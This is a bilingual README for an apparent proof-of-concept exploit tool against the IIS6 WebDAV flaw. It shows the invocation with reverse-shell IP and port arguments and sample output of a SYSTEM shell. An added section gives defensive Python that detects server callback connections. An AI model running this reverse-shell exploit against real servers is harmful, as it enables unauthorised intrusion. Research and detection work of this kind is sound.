EN

GenWebDavIISExploit is a PoC tool demonstrating an exploit for a known vulnerability in the WebDAV component of IIS6. This tool is designed for educational and research purposes to showcase how the vulnerability can be leveraged to execute arbitrary code on a remote server.

Disclaimer

This project is intended for educational purposes only. Use this tool responsibly and only on systems you own or have explicit permission to test. Unauthorized access to computer systems is illegal.

Features

  • Remote code execution on vulnerable IIS6 WebDAV servers.
  • Dynamic payload generation with user-specified reverse IP and port.
  • Easy-to-use command-line interface for rapid exploitation.

Prerequisites

  • Python 3.x: Ensure that Python 3 is installed on your system.
  • Network Access: Ability to connect to the target machine's IP and port.

Usage

Command-Line Arguments

  • Target IP: The IP address of the target IIS6 WebDAV server.
  • Target Port: The port number on which the WebDAV service is running (usually 80).
  • Reverse IP: Your IP address where the reverse shell should connect.
  • Reverse Port: The port number on your system to receive the reverse shell.

Example

```
python3 GenWebDavIISExploit.py <target_ip> <target_port> <reverse_ip> <reverse_port>
```

Usage Example

```
python3 GenWebDavIISExploit.py 192.168.1.10 80 192.168.1.5 4444
```

Example output

```
$ python3 GenWebDavIISExploit.py 192.168.1.10 80 192.168.1.5 4444

[*] Connecting to target 192.168.1.10 on port 80...
[*] Sending a specially crafted HTTP request to exploit the vulnerability...
[*] Payload length: 1744 bytes
[*] Waiting for a return connection...

[+] Response from target:
HTTP/1.1 200 OK
Content-Length: 123
Server: Microsoft-IIS/6.0

[+] Received a connection back from 192.168.1.10:12345
[+] Remote access successfully established!

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32> ipconfig
Windows IP Configuration

   Ethernet Local Area Connection adapter:
      DNS connection suffix . . . . . . : example.local
      IPv4 address. . . . . . . . . . . : 192.168.1.10
      Subnet mask . . . . . . . . . . . : 255.255.255.0
      Main gateway. . . . . . . . . . . : 192.168.1.1
```

Notes

  • Ensure you have a listener running on the specified reverse port to capture the incoming reverse shell.
  • Use this tool only on authorized systems to test for vulnerabilities.
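
A defender-side check for the pattern visible in the example output above, where the web server itself opens a connection back to a host that had just sent it an HTTP request. This is an added example, not part of GenWebDavIISExploit; the flow-record format and the names `parse_flows` and `find_callbacks` are hypothetical, and the sample records are constructed from the README's example addresses.

```python
from datetime import datetime, timedelta

# Constructed sample flow records (not captured traffic): time, source, destination.
# Addresses and ports mirror the README's example run.
SAMPLE_FLOWS = """\
2024-01-01T10:00:00 192.168.1.7:51000 192.168.1.10:80
2024-01-01T10:00:05 192.168.1.5:50222 192.168.1.10:80
2024-01-01T10:00:07 192.168.1.10:12345 192.168.1.5:4444
2024-01-01T10:02:00 192.168.1.10:49200 192.168.1.53:53
2024-01-01T11:30:00 192.168.1.10:49300 192.168.1.7:8080
"""


def parse_flows(text):
    """Parse 'ISO-time src_ip:port dst_ip:port' lines into tuples."""
    flows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst = line.split()
        src_ip, src_port = src.rsplit(":", 1)
        dst_ip, dst_port = dst.rsplit(":", 1)
        flows.append((datetime.fromisoformat(ts), src_ip, int(src_port), dst_ip, int(dst_port)))
    return flows


def find_callbacks(flows, server_ip, web_ports=(80, 443), allowed_dsts=(),
                   window=timedelta(seconds=60)):
    """Flag connections the web server opens to a client that hit it within `window`."""
    last_seen = {}  # client IP -> time of its latest inbound web request
    alerts = []
    for ts, src_ip, _sport, dst_ip, dst_port in sorted(flows):
        if dst_ip == server_ip and dst_port in web_ports:
            last_seen[src_ip] = ts
        elif src_ip == server_ip and dst_ip not in allowed_dsts:
            seen = last_seen.get(dst_ip)
            if seen is not None and ts - seen <= window:
                alerts.append({"time": ts.isoformat(), "dst": f"{dst_ip}:{dst_port}",
                               "seconds_after_request": (ts - seen).total_seconds()})
    return alerts


if __name__ == "__main__":
    for alert in find_callbacks(parse_flows(SAMPLE_FLOWS), "192.168.1.10",
                                allowed_dsts=("192.168.1.53",)):
        print(alert)
```

On the constructed records only the connection to 192.168.1.5:4444 is flagged; the allowlisted DNS lookup and the connection made long after the last request from that client are not.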

RU

GenWebDavIISExploit is a PoC tool that demonstrates exploitation of a known vulnerability in the WebDAV component on IIS6. This tool is created for educational and research purposes to show how the vulnerability can be exploited to execute arbitrary code on a remote server.

Disclaimer

This project is intended for educational purposes only. Use this tool responsibly and only on systems that you own or have explicit permission to test. Unauthorized access to computer systems is illegal.

Features

  • Execution of remote code on vulnerable IIS6 WebDAV servers.
  • Dynamic payload code generation with IP and port specification for the reverse connection.
  • Simple command line interface for quick use.

Requirements

  • Python 3.x: Make sure you have Python 3 installed.
  • Network Access: Ability to connect to the target machine's IP address and port.

Usage

Command line arguments

  • Target IP: IP address of the target IIS6 WebDAV server.
  • Target Port: The port number on which the WebDAV service is running (usually 80).
  • Reverse IP: Your IP address to which the reverse connection should be established.
  • Reverse Port: The port number on your system to receive the reverse connection.

Example

```
python3 GenWebDavIISExploit.py <target_ip> <target_port> <reverse_ip> <reverse_port>
```

Example usage

```
python3 GenWebDavIISExploit.py 192.168.1.10 80 192.168.1.5 4444
```

## Example output
```
$ python3 GenWebDavIISExploit.py 192.168.1.10 80 192.168.1.5 4444

[*] Connecting to target 192.168.1.10 on port 80...
[*] Sending a specially crafted HTTP request to exploit the vulnerability...
[*] Payload length: 1744 bytes
[*] Waiting for a return connection...

[+] Response from target:
HTTP/1.1 200 OK
Content-Length: 123
Server: Microsoft-IIS/6.0

[+] Received back connection from 192.168.1.10:12345
[+] Remote access successfully established!

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32> ipconfig
Windows IP Configuration

   Ethernet Local Area Connection adapter:
      DNS connection suffix . . . . . . : example.local
      IPv4 address. . . . . . . . . . . : 192.168.1.10
      Subnet Mask . . . . . . . . . . . : 255.255.255.0
      Default Gateway . . . . . . . . . : 192.168.1.1
    
```


## Notes

- Make sure you have a listener running on the specified reverse port to intercept the incoming reverse connection.
- Use this tool only on authorized systems to check for vulnerabilities.